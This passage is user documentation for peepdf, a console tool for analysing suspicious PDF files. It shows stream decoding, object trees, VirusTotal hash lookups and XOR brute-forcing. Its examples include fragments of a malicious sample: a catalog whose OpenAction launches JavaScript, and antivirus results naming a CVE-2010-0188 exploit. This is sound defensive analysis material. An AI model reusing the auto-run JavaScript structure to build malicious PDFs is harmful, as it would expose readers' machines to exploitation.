78 da 05 c1 7b 7f 6a 60 00 00 e0 cf 72 dc 5e 8b |x...{�j....r.^.| 5a 26 22 8a 37 62 ea 87 cd ad 8b cb ab 25 e4 54 |Z&".7b.......%.T| a7 da fa 77 9f fd 3c cf 92 bd 3f 18 bd 89 47 50 |...w..<...?...GP| 69 69 d2 81 34 6b 3b f5 c2 17 cc d3 6b bb 90 f8 |ii..4k;.....k...| b7 b0 f5 5e 58 48 7c 7f 84 1a 1c b8 ed f9 4e 23 |...^XH|�......N#| 40 2a 68 5e 43 af eb 7b 8e f2 35 cb f0 2a 2b 3f |@*h^C..{..5..*+?| 41 95 64 b0 a9 af d8 a1 f0 af 51 eb 39 e3 b7 34 |A.d.......Q.9..4| 2a 84 9d 41 1c 5f ad 59 82 3b fd e9 4a 35 39 9b |*..A._.Y.;..J59.| db 30 64 3e 92 d4 6c 21 98 e4 0b 2b 31 e7 e8 6e |.0d>..l!...+1..n| 21 89 2e f6 d4 96 57 b4 54 1e 26 61 b7 b6 16 93 |!.....W.T.&a....| 67 68 b8 be 8b 79 f1 fe 82 ee eb e2 99 92 f7 68 |gh...y.........h| b0 b4 5c 14 10 dc 38 3f dc f8 d0 ac 60 ff 36 a5 |..\...8?....
d6 d8 e3 b2 61 75 0c 2b 1f a6 b6 17 5a cd ea 3a |....au.+....Z..:|
7f ff a3 11 b6 38 e0 29 5c e0 6e 72 a9 73 1b 6d |�....8.).nr.s.m|
2e c7 9c 92 83 a3 48 96 bb 3f cc 64 85 af a8 44 |......H..?.d...D|
92 ed a6 50 e9 56 fa 4b f5 6f e2 67 e0 43 e6 56 |...P.V.K.o.g.C.V|
7d d8 58 10 a9 70 a8 e0 3b 25 d1 29 e3 ab 2a 7b |}.X..p..;%.)..{|
f2 2a bd c8 9d c1 51 64 80 d5 8c e0 70 f6 74 0b |.....Qd....p.t.|
bc 73 47 52 c8 e3 3a 2c 66 2f c1 bf 1f 10 27 ea |.sGR..:,f/....'.|
ee 31 b2 4c 15 80 51 c5 1e 76 bc 7b 9a 65 c4 7b |.1.L..Q..v.{.e.{|
ef a4 20 66 b9 42 43 8e 96 3b 28 9e 45 4b a2 c4 |.. f.BC..;(.EK..|
a9 21 74 6c 93 15 44 b9 05 5a 63 e7 66 d4 a8 48 |.!tl..D..Zc.f..H|
2e e7 39 18 c7 c6 58 19 82 0d 16 7c 5f 7b c7 8b |..9...X....|_{..|
8a ab 6b 2f e5 eb 24 3c 6c f5 8a d8 ca 68 51 3c |..k/..$<l....hQ<|
9e cb 89 f3 3b fb 0f 6c d4 7d d7 0d 0a |....;..l.}...|
<br />
### show ###
Usage: show var_name
Shows the value of the specified variable
Special variables:
PPDF> set myHelloVar "Hello World!!" PPDF> show myHelloVar
Hello World!!
<br />
### stream ###
Usage: stream object_id [version]
Shows the object stream content of the specified version after being decoded and decrypted (if necessary)
PPDF> rawstream 1
78 9c 45 8e c1 0a 83 30 10 44 ef f9 8a f9 83 4d |x.E....0.D.....M| 5a 15 0b 22 b4 de 2c a5 a2 bd 15 0f c1 06 09 14 |Z.."..,.........| 23 1a 4b fb f7 5d 6b a0 2c 7b d8 61 e6 ed 28 48 |#.K..]k.,{.a..(H| ec 10 2b ec 71 88 10 41 25 29 b2 0c 74 fb 8c 06 |..+.q..A%)..t...| 54 68 af 9f ae 17 54 e9 de cc 6c 94 a8 05 5d 47 |Th....T...l...]G| 33 1c 3b 6f dd c0 01 56 90 e7 6b e4 6c 1f 33 ee |3.;o...V..k.l.3.| 0c 5a a5 56 04 c4 2f 29 a8 70 cb e0 a1 82 b5 d2 |.Z.V../).p......| 93 e1 33 f0 fe 46 41 b5 99 dd 32 75 fc 8c 7d 79 |..3..FA...2u..}y| 2e e8 62 1e 56 9f dc 9b c9 92 27 91 12 29 6f 1b |..b.V.....'..)o.| 48 5b 76 6b 23 a8 01 95 fa a5 9b 6e b2 a3 17 54 |H[vk#......n...T| 36 88 43 c1 2f a0 0d 3e 09 0a |6.C./..>..|
PPDF> stream 1
1 0 2 51 3 94 4 168 << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >><< /Kids [ 3 0 R ] /Type /Pages /Count 1 >><< /Parent 2 0 R /Type /Page /Resources << >> /MediaBox [ 0 0 600 800 ] >><< /Type /Action /S /JavaScript /JS 5 0 R >>
<br />
### tree ###
Usage: tree [num_version]
Shows the tree graph of the file or specified version
It's useful to see all the dependencies between objects in a visual way, the output is the logical structure of the document.
PPDF> tree
/Catalog (1) /Fields (5) array (2) /JavaScript (7) /Names (10) /Action /JavaScript (12) string (13) /Pages (4) /Page (9) /Pages (4) stream (11) /ProcSet (8) /ProcSet (8) /Outlines (3) dictionary (6) /Info (14)
### vtcheck ###
Usage: vtcheck Usage: vtcheck object|rawobject|stream|rawstream $object_id [$version] Usage: vtcheck raw $offset $num_bytes Usage: vtcheck file $file_name Usage: vtcheck variable $var_name
Checks the hash of the specified source on VirusTotal: raw bytes of the file, objects and streams, and the content of files or variables. If no parameters are specified then the hash of the PDF document will be checked.
*** NOTE: You need a VirusTotal API key to use this command.
With this command you can check the hash of the PDF file on [VirusTotal](https://www.virustotal.com). But not only the PDF file itself but also the hash of any object, rawobject, stream, rawstream, raw bytes, files or variable. It is important to say that no content is sent to VirusTotal, just the hashes. Also, you will need a VirusTotal API key to use this command.
Detection rate: 26/47 Last analysis date: 2013-07-01 05:43:24 Report link: https://www.virustotal.com/file/ba3c7c763f7910ef956e27be054e9271b00d05aab9fb153cdf30001ce422d68a/analysis/1372657404/ Scan results:
nProtect 2013-07-01.01 20130701 Exploit.TIFF.Gen
McAfee 5.400.0.1158 20130701 Artemis!7101F6998958
K7AntiVirus 9.170.8927 20130628 Exploit
F-Prot 20130630 CVE-0188
Symantec 20131.1.0.101 20130701 Trojan.Pidief.I
Norman 7.01.04 20130701 Exploit_Gen.KDB
TrendMicro-HouseCall 9.700.0.1001 20130701 TROJ_GEN.R4FH1KI
Avast 8.0.1489.320 20130701 JS:Pdfka-gen [Expl]
Kaspersky 20130701 HEUR:Exploit.Script.Generic
BitDefender 7.2 20130701 Exploit.TIFF.Gen
Agnitum 20130630 Exploit.CVE-2010-0188
Emsisoft 20130701 Exploit.TIFF.Gen (B)
Comodo 16523 20130701 UnclassifiedMalware
F-Secure 11.0.19100.45 20130701 Exploit.TIFF.Gen
DrWeb 20130701 SCRIPT.Virus
AntiVir 20130701 EXP/Pdfjsc.EH.14
TrendMicro 9.740.0.1012 20130701 EXPL_CVE20100188
Sophos 4.90.0 20130701 Troj/PDFJs-II
Microsoft 1.9607 20130701 Exploit:Win32/Pdfjsc.EX
GData 22 20130701 Exploit.TIFF.Gen
Commtouch 20130630 CVE-0188
PCTools 20130701 Trojan.Pidief
Ikarus T3. 20130701 Exploit.Win32.CVE-2010-0188
Fortinet 20130701 W32/PDFJs.II!tr
AVG 20130630 Exploit
Panda 20130630 Exploit/PDF.Gen.B
### xor ###
Usage: xor stream|rawstream $object_id [$version] [$key] Usage: xor raw $offset $num_bytes $key Usage: xor file $file_name $key Usage: xor variable $var_name $key
Performs an XOR operation using the specified key with the content of the specified file or variable, raw bytes of the file or stream/rawstream. If the key is not specified then a bruteforcing XOR is performed.
PPDF> xor file test_file 0x12
PPDF> xor stream 7 0xfa
d2 bb 9b 9b 9b 9b d3 da ae 90 |..........|
If the key is not specified then a bruteforcing XOR is performed:
PPDF> xor stream 7
[0x0] (Aaaaa) Tj [/0x0] [0x1] )@````(!Uk [/0x1] [0x2] Ccccc+"Vh [/0x2] [0x3] +Bbbbb#Wi [/0x3] [0x4] ,Eeeee-$Pn [/0x4] [0x5] -Ddddd,%Qo [/0x5] [0x6] .Ggggg/&Rl [/0x6] [0x7] /Fffff.'Sm [/0x7] ...
PPDF> xor raw 100 50 0x16
### xor\_search ###
Usage: xor_search [-i] stream|rawstream $object_id [$version] $string_to_search Usage: xor_search [-i] raw $offset $num_bytes $string_to_search Usage: xor_search [-i] file $file_name $string_to_search Usage: xor_search [-i] variable $var_name $string_to_search
Searches for the specified string in the result of an XOR brute forcing operation with the content of the specified file or variable, raw bytes of the file or stream/rawstream. The output shows the offset/s where the string is found. It's a case sensitive search but it's possible to make it insensitive using -i.
PPDF> xor_search stream 2 "template"
Pattern found with the following keys: ['0x0']
Offsets for key '0x0': [407, 466, 607, 624, 684, 825, 843, 903, 1044]
PPDF> xor file test_file 0x63 > xored_test PPDF> xor_search file xored_test "file"
Pattern found with the following keys: ['0x63']
Offsets for key '0x63': [19]
PPDF> xor_search -i file xored_test "file"
Pattern found with the following keys: ['0x43', '0x63']
Offsets for key '0x43': [19] Offsets for key '0x63': [19]
PPDF> xor file xored_test 0x43
PPDF> xor file xored_test 0x63
Hi, this is a test file!
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